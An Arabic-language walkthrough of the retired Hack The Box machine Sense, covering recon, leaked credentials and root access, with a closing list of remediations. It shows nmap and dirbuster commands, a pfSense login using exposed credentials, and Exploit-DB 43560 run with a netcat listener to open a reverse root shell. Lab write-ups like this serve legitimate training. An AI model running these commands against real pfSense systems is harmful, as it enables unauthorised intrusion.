حافظ على هدوئك واخترق Sense: دليل شامل لاختبار الاختراق على Hack The Box
Aldawsari 
تُعد منصة Hack The Box (HTB) بيئة تعليمية وتدريبية ممتازة للمهتمين باختبار الاختراق والأمن السيبراني. توفر المنصة مجموعة واسعة من التحديات التي تُحاكي سيناريوهات واقعية لأنظمة قابلة للاختراق، بالإضافة إلى تحديات بأسلوب مسابقات CTF. هذه المقالة هي دليل تفصيلي لاختراق آلة Sense، وهي آلة بسيطة نسبيًا لكنها تُسلط الضوء على مخاطر ممارسات كلمات المرور السيئة وكيفية استغلال الملفات الداخلية المكشوفة على الأنظمة المتاحة للجمهور.
ملاحظة هامة: يُسمح فقط بكتابة أدلة الاختراق للآلات التي تم إيقافها (Retired HTB machines) لضمان عدم إفساد التجربة التعليمية للمستخدمين الآخرين.
خلال هذا الدليل، سنستخدم مجموعة من الأدوات الأساسية المتوفرة في توزيعة Kali Linux لاختراق آلة Sense، وتشمل هذه الأدوات:
nmap: لأغراض مسح الشبكة وتحديد المنافذ المفتوحة.dirbuster: لمسح الدلائل والملفات على خوادم الويب.searchsploit: للبحث عن الثغرات المعروفة والاستغلالات.
لنبدأ رحلتنا في عالم اختبار الاختراق!
الخطوة 1: الاستطلاع وجمع المعلومات (Reconnaissance)
تُعد مرحلة الاستطلاع وجمع المعلومات هي الأساس لأي عملية اختبار اختراق ناجحة. تخصيص وقت كافٍ لهذه المرحلة يضمن الحصول على أكبر قدر ممكن من المعلومات حول الهدف، مما يُسهل تحديد نقاط الضعف المحتملة واستراتيجيات الاستغلال اللاحقة.
مسح المنافذ باستخدام Nmap
سنبدأ باستخدام أداة Nmap (Network Mapper)، وهي أداة مجانية ومفتوحة المصدر تُستخدم لاكتشاف الشبكات وتدقيق الأمن. تعتمد Nmap على حزم IP الأولية لتحديد المضيفين المتاحين على الشبكة، والخدمات التي يقدمونها، وأنظمة التشغيل التي تعمل عليها، وأنواع جدران الحماية المستخدمة، والعديد من الخصائص الأخرى.
لإجراء مسح مكثف وشامل، نستخدم الأمر التالي:
nmap -A -v 10.10.10.60-A: يُفعّل اكتشاف نظام التشغيل، واكتشاف إصدارات الخدمات، ومسح السكربتات، وتتبع المسار (traceroute).-v: يزيد من مستوى الإسهاب في الإخراج لعرض تفاصيل أكثر.10.10.10.60: هو عنوان IP الخاص بآلة Sense.
إذا كانت النتائج تبدو معقدة للغاية، يمكنك تجربة أمر مسح أبسط للحصول على نظرة عامة سريعة:
nmap 10.10.10.60
من خلال نتائج المسح، نلاحظ وجود منفذين مفتوحين رئيسيين:
- المنفذ 80: يُستخدم غالبًا لبروتوكول نقل النص التشعبي (
HTTP). - المنفذ 443: هو المنفذ القياسي لجميع حركة مرور HTTP المؤمنة (
HTTPS).
مسح الدلائل باستخدام DirBuster
استمرارًا في مرحلة الاستطلاع، ننتقل الآن إلى استخدام أداة DirBuster. تُعد DirBuster تطبيق Java متعدد الخيوط مصممًا لاختبار تخمين أسماء الدلائل والملفات (brute force) على خوادم الويب والتطبيقات.
يمكنك تشغيل DirBuster إما بكتابة الأمر التالي في الطرفية:
dirbusterأو بالبحث عن التطبيق ضمن قائمة تطبيقات Kali Linux.
إصدار Kali قديم
إصدار Kali حديث
تظهر واجهة التطبيق حيث يمكنك تحديد عنوان URL المستهدف، والذي سيكون في حالتنا https://10.10.10.60. يمكنك اختيار قائمة كلمات (wordlist) تحتوي على قائمة بالدلائل والملفات المحتملة بالنقر على زر Browse.
سنستخدم قائمة الكلمات directory-list-2.3-medium.txt لهذا البحث. بعد اكتمال المسح، يمكننا رؤية بعض الملفات المثيرة للاهتمام:
الخطوة 2: استكشاف الملفات المكتشفة
بعد جمع المعلومات الأولية، حان الوقت لاستكشاف الملفات التي عثرنا عليها عبر مسح الدلائل. هذه الملفات قد تحتوي على معلومات قيمة تُساعدنا في التقدم.
فحص ملف changelog.txt
لننتقل إلى الملف changelog.txt. عند فحصه، نجد معلومات حول سجل التغييرات الأمنية، بما في ذلك تفاصيل حول إصلاح الثغرات الأمنية والجداول الزمنية المتعلقة بها. هذه المعلومات قد تكون مفيدة لتحديد إصدارات البرمجيات المستهدفة أو الثغرات المعروفة.
فحص ملف system-users.txt
ملف آخر مثير للاهتمام هو system-users.txt. هذا الملف يحتوي على اسم مستخدم، بالإضافة إلى تلميح حول كلمة المرور. تُعد هذه الثغرة الكلاسيكية لتخزين معلومات حساسة في ملفات نصية مكشوفة خطأً أمنيًا فادحًا.
الخطوة 3: زيارة صفحة الويب وتحديد الهدف
الآن، لننتقل إلى زيارة الموقع الإلكتروني المستهدف. نلاحظ وجود لوحة تحكم خاصة بـ pfSense.
ما هو pfSense؟
pfSense هو توزيعة برمجية مفتوحة المصدر لجدار حماية/موجه (firewall/router) مبنية على نظام FreeBSD. تُثبت هذه التوزيعة على جهاز كمبيوتر فعلي أو آلة افتراضية لإنشاء جدار حماية/موجه مخصص للشبكة. يمكن تهيئتها وترقيتها عبر واجهة مستندة إلى الويب، ولا تتطلب معرفة بالنظام الأساسي FreeBSD لإدارتها.
للحصول على معلومات إضافية، يمكن زيارة الموقع الرسمي: https://www.pfsense.org/
البحث عن بيانات الاعتماد الافتراضية
بالبحث السريع على Google عن اسم المستخدم وكلمة المرور الافتراضيين لـ pfSense، نجد وثائق على Netgate Docs تُشير إلى بيانات الاعتماد الافتراضية.
باستخدام اسم المستخدم Rohit وكلمة المرور pfsense (التي وجدناها أيضًا في ملف system-users.txt)، نتمكن من تسجيل الدخول بنجاح إلى لوحة التحكم! من لوحة المعلومات، يمكننا جمع المزيد من المعلومات، وأهمها تحديد الإصدار الدقيق الذي نعمل عليه: 2.1.3-RELEASE (amd64).
الخطوة 4: البحث عن استغلال (Exploit)
بعد تحديد نوع النظام وإصداره، ننتقل إلى مرحلة البحث عن استغلال معروف لهذه النسخة. سنستخدم أداة Searchsploit، وهي أداة بحث سطر أوامر لقاعدة بيانات Exploit Database.
استخدام Searchsploit
نستخدم الأمر التالي للبحث عن استغلالات متعلقة بـ pfSense:
searchsploit pfsense
نحصل على تفاصيل أكثر حول استغلال معين باستخدام الأمر:
searchsploit -x 43560.py
يمكنك أيضًا التحقق من قاعدة بيانات Exploit Database مباشرة للعثور على نفس الاستغلال.
رابط الاستغلال على Exploit Database: https://www.exploit-db.com/exploits/43560
للحصول على معلومات حول موقع الاستغلال على نظام Kali الخاص بك، نستخدم:
searchsploit -p 43560.py
الآن، نقوم بنسخ ملف الاستغلال إلى مجلد العمل الحالي لدينا (مجلد Sense) باستخدام الأمر:
cp /usr/share/exploitdb/exploits/linux/remote/43560.py .وللتحقق من أنه تم نسخه بنجاح في هذا المجلد:
ls -la
تنفيذ الاستغلال والحصول على Shell
في نافذة طرفية (terminal) منفصلة (الجانب الأيمن)، نقوم بإعداد مستمع (listener) باستخدام Netcat على المنفذ 1234:
nc -nvlp 1234ثم في نافذة طرفية أخرى (الجانب الأيسر)، نقوم بتشغيل الاستغلال باستخدام Python، مع تحديد عنوان IP للهدف (--rhost) وعنوان IP لجهازنا (--lhost) ومنفذ المستمع (--lport)، بالإضافة إلى اسم المستخدم وكلمة المرور التي اكتشفناها:
python 43560.py --rhost 10.10.10.60 --lhost 10.10.14.13 --lport 1234 --username rohit --password pfsense
تهانينا! لقد حصلنا على shell بصلاحيات المستخدم الجذر (root)!
لنبدأ بجمع بعض المعلومات الأساسية. الأمر id يُعيد معرف المستخدم الحقيقي للعملية التي تستدعيه، ويُؤكد أننا الآن بصلاحيات root.
الخطوة 5: البحث عن الأعلام (Flags)
الآن بعد أن أصبح لدينا وصول بصلاحيات الجذر، حان الوقت للبحث عن الأعلام (flags) المطلوبة لإكمال التحدي.
العثور على علم المستخدم (user.txt)
نتوجه إلى مجلد المستخدم rohit داخل مجلد home. يمكننا سرد جميع الملفات والمجلدات باستخدام الأمر:
ls -laثم ننتقل إلى مجلد home:
cd home
وهنا نجد علم المستخدم (user.txt)! نتحقق من محتويات الملف باستخدام الأمر:
cat user.txtالعثور على علم الجذر (root.txt)
لنبحث الآن عن علم الجذر. ننتقل إلى مجلد root. نجد ملف root.txt ونفحص محتوياته باستخدام الأمر:
cat root.txt
تهانينا! لقد عثرت على كلا العلمين بنجاح، مما يُشير إلى إكمال اختراق آلة Sense.
التحسينات الأمنية والتوصيات (Remediations)
بعد إكمال عملية الاختراق، من الضروري دائمًا تسليط الضوء على نقاط الضعف التي تم استغلالها وتقديم توصيات لتحسين الأمن. إليك أهم التحسينات الأمنية المستخلصة من هذا التحدي:
- تجنب تخزين المعلومات الحساسة: يجب عدم تخزين معلومات حساسة مثل بيانات اعتماد تسجيل الدخول أو حالة التصحيح (patching status) في ملفات نصية مكشوفة على خادم الويب.
- تحديث التطبيقات بانتظام: يجب تحديث تطبيق pfSense إلى أحدث إصدار متاح لتصحيح الثغرات الأمنية المعروفة.
- تغيير كلمات المرور الافتراضية: تأكد دائمًا من تغيير كلمات المرور الافتراضية عند إعداد تطبيقات أو خوادم أو منصات جديدة.
- تطبيق مبدأ الحد الأدنى من الامتيازات (Least Privilege): طبق مبدأ الحد الأدنى من الامتيازات على جميع أنظمتك وخدماتك، مما يعني منح المستخدمين والعمليات الحد الأدنى من الصلاحيات اللازمة لأداء وظائفهم.
لا تتردد في طرح الأسئلة أو مشاركة هذا الدليل مع أصدقائك وزملاءك المهتمين بالأمن السيبراني. يمكنك الاطلاع على المزيد من المقالات في سلسلة “حافظ على هدوئك واخترق Hack The Box” هنا.
يمكنك متابعة الكاتبة Sonya Moisset على Twitter أو LinkedIn.
ولا تنسَ دائمًا: #GetSecure، #BeSecure & #StaySecure!
الخلاصة التقنية
تُقدم آلة Sense في Hack The Box مثالًا تعليميًا ممتازًا حول المخاطر الأمنية الناجمة عن الإهمال في إدارة كلمات المرور وتخزين الملفات الحساسة. لقد أظهر هذا الدليل كيف يمكن لمسح بسيط للمنافذ والدلائل باستخدام أدوات مثل Nmap و DirBuster أن يكشف عن معلومات حيوية. كما أكد على أهمية تحديث الأنظمة (مثل pfSense) وتغيير بيانات الاعتماد الافتراضية فورًا. تُعد هذه التجربة تذكيرًا قويًا بأن العديد من الثغرات الأمنية الشائعة يمكن تجنبها من خلال تطبيق ممارسات أمنية أساسية ولكنها حاسمة.